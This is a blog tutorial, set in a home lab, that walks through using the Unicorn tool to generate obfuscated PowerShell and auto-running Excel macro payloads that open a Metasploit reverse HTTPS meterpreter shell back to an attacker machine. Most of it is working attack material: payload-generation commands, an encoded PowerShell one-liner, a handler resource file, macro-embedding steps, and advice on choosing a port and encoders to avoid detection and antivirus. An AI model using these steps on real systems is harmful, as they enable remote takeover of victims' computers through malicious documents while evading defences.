Select Page

In this tutorial I show how to inject shellcode into memory using Unicorn. Unicorn is a package created by Dave Kennedy, www.trustedsec.com.

Attack Plan

We set a reverse HTTPS payload. There are pros and cons to the reverse-HTTPS shell, take a look at using a reverse-TCP shell. Upon executing it, a meterpreter session will be opened. From there all the capabilities of a meterpreter session are available at our fingertips. HTTPS means the connection is SSL encrypted, an added bonus of this payload type. However, many networks intercept and decode SSL encrypted traffic. What does that mean for our plan? Even if the traffic containing our exploit executing is decrypted, Unicorn leverages not just one but two types of encoding built into Kali, the “shikata ga nai” and the x86/bloxer(Windows 32 bit) encoders.

As I’ve covered before using a reverse shell is an ethical hacking standard. The way it works is the victim machine calls backwards to the attacking machine. Few firewalls of course block outbound port 80 or port 8080 traffic, therefore it is an ideal route to connect by. We are going to chose port 8080. This port is a lot less obvious, for instance than traffic going over 443. Same as port 80. The cat is out of the bag there, because everyone knows 443 traffic is something to investigate. In other words, that is naturally something you do not want.

Delivery Methods covered in this tutorial:

  • Powershell commands
  • VBS Macro

Here’s What You Need

You need these things to follow this tutorial, if you need help see this quick and easy guide I have already made.

  • Kali Linux Instance (VirtualBox)
  • Windows 10 Instance (VirtualBox)
  • Custom Virtual Network (VirtualBox)
  • Unicorn package, get it here.

Powershell Delivery

Powershell is fantastic, just not to look at, or even to use really. What’s so good about Powershell then? It’s Windows native, in other words it is already installed on every Windows machine. If you do alot of reading into ethical hacking methodologies you will recognize this as a prime example of “living off the land”. For instance consider why one should take the time and risk to download third party programs to exploit a victim host when those tools already on it can be used. Let’s get started.

# download or git clone the repository into your root dir
root@kali:~ unzip unicorn-master.zip

# generate the payload
root@kali:~/unicorn-master python unicorn.py windows/meterpreter/reverse_https 10.0.0.2 8080

Running the command above created two files. The first is powershell_attack.txt and the second is unicorn.rc.

# take a look at the powershell payload text
root@kali:~/unicorn-master cat powershell_attack.txt

powershell /w 1 /C "s''v Yi -;s''v ijX e''c;s''v Ly ((g''v Yi).value.toString()+(g''v ijX).value.toString());powershell (g''v Ly).value.toString() ('JABY ....more encoded strings')"

Looking at the contents of the unicorn.rc file we see there are lines of what look like metasploit commands. “set ExitOnSession false” means every payload delivered will open a new separate session. In other words, a new meterpreter session for every new connection.

# take a look at the second file, unicorn.rc
root@kali:~/unicorn-master cat unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.0.0.2
set LPORT 8080
set ExitOnSession false
set EnableStageEncoding true
exploit -j

The file unicorn.rc is a c/c++ style resource file. It is used in this scenario for automating some of the commands for Metasploit to execute. Consider this file as being similar to a bash script. This would be the same as if you were already in msfconsole running each of them. For example, running this command manually: msf set LHOST <ip address>.

# run the resource file as documented
root@kali:~/unicorn-master msfconsole -r unicorn.rc

Running the resource file initiates all the commands, seen below.

inject shellcode into memory using unicorn

Test the Reverse HTTPS Connection

It is always a good idea to make sure there is a connection possible to the host. This is done using an ICMP request and confirmed by a reply. It is also done by opening up a web browser and entering the ip address of the Kali Linux machine. Do so in this format: <kali-ip-address:8080>.

Now we are sure the the connection works. The next obstacle is creating a persistent shell to the target. What we have done is merely test that the Metsaploit console’s listener, the multi/handler can capture the attack. In order to initiate an active meterpreter session, you need to execute the payload on the victim machine. Remeber the payload is in powershell_attack.txt.

Execute Payload On Victim

Once the code found in powershell_attack.txt is executed on the victim, then a meterpreter session is opened in msfconsole.

Now to see the open session(s).

# list sessions
msf exploit(multi/handler) > sessions -l 

# open a session prompt
msf exploit(multi/handler) > sessions 1

VBA Macro Delivery

To use Unicorn to generate a macro the command is simple. Printing out the help instructions we see an example is given clearly. “Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro”

# macro time
root@kali:~/unicorn-master python unicorn.py windows/meterpreter/reverse_https 10.0.0.2 8080 macro

Open a Excel document and hit Alt+F11. Create a new macro by navigating to Tools > Macros. Name the new macro “Auto_Open” and click Create. Now paste the contents of powershell_attack.txt into the new macro and save. IMPORTANT If the version of Microsoft Office is later than 2016 then save the macro as AutoOpen. The first line of the macro should say “Dim AutoOpen()”. Check this to make sure. Save the document as a macro-enabled document type.

Per Unicorn help instructions, Office versions 2016+ should be AutoOpen(). Older versions are ok to use Auto_Open().
# start the listener
root@kali:~/unicorn-master msfconsole -r unicorn.rc

The final step is to open the document on the victim machine. Doing so opens a meterpreter session. In conclusion, that is how to use Unicorn to execute shellcode in memory to evade antivirus detection.

error: